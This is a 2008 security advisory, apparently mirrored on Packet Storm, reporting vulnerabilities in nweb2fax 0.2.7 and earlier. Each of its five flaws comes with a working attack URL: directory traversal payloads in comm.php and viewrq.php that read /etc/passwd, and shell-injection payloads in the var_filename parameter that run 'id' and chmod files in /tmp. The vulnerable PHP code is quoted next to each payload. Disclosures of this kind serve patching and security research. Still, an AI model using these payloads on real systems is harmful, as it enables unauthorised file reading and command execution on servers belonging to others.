nweb2fax versions 0.2.7 and below suffer from remote code execution, arbitrary file download, and local file inclusion vulnerabilities.
ebaef90904799bff29790ae1e7b046c4f9c78d8c3f47ba51439b72a1408eea92 :::::::-. ... ::::::. :::.
;;, `';, ;; ;;;`;;;;, `;;;
`[[ [[[[' [[[ [[[[[. '[[
$$, $$$$ $$$ $$$ "Y$c$$
888_,o8P'88 .d888 888 Y88
MMMMP"` "YmmMMMM"" MMM YM
[ Discovered by dun \ dun[at]strcpy.pl ]
##################################################################
# [ nweb2fax <= 0.2.7 Multiple Remote Vulnerabilities ] #
##################################################################
#
# Script site: http://sourceforge.net/projects/nweb2fax/
#
# [ Local File Inclusion Vulnerability ]:
# *** /comm.php?id=../../../../../../../../../../etc/passwd
#
# Bug:
#
# ...
# $var_id=$_GET['id'];
# $fileary = file ( "$DIR_SPOOL/log/c$var_id" );
# reset($fileary);
# foreach ($fileary as $line) {
# if( trim($line) != "" ){
# print "<br>$line";
# }
# }
# ...
#
#
# [ Arbitrary File Download Vulnerability ]:
#
*** /viewrq.php?format=ps&var_filename=../../../../../../../../../../etc/passwd
#
# Bug:
#
# ...
# $var_filename=$_GET['var_filename'];
# $var_format=$_GET['format'];
# ...
# if( $var_format == "ps" ) {
# $filename = "$DIR_SPOOL/$var_filename";
# header("Content-Type: application/postscript");
# header('Content-Disposition: attachment;
filename="downloaded.ps"');
# readfile("$filename");
# ...
#
#
# [ Remote Command Execution 1]:
# *** /viewrq.php?format=tif&var_filename=;id%3E/tmp/id.txt;chmod%
20777%20/tmp/id.txt;
#
# Bug:
# ...
# $var_filename=$_GET['var_filename'];
# $var_format=$_GET['format'];
# ...
# } elseif ($var_format == "pdf") {
# ...
# $recvq_filename = "$DIR_SPOOL/$var_filename";
# ...
# exec("$PROG_TIFF2PS -a -O $FILE_TMP1 $recvq_filename",$exec_output,
$exec_return);
# ...
#
#
# [ Remote Command Execution 2]:
# *** /viewrq.php?format=pdf&var_filename=;id%3E/tmp/id2.txt;chmod%
20777%20/tmp/id2.txt;id
#
# Bug:
# ...
# $var_filename=$_GET['var_filename'];
# $var_format=$_GET['format'];
# ...
# } elseif ($var_format == "pdf") {
# ...
# $recvq_filename = "$DIR_SPOOL/$var_filename";
# ...
# $cmd="$PROG_CAT $recvq_filename | $PROG_GS $gs_options";
# ...
# exec($cmd,$exec_output,$exec_return);
# ...
#
#
###############################################
# Greetz: D3m0n_DE * sid.psycho * str0ke and otherz..
###############################################
[ dun / 2008 ]
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed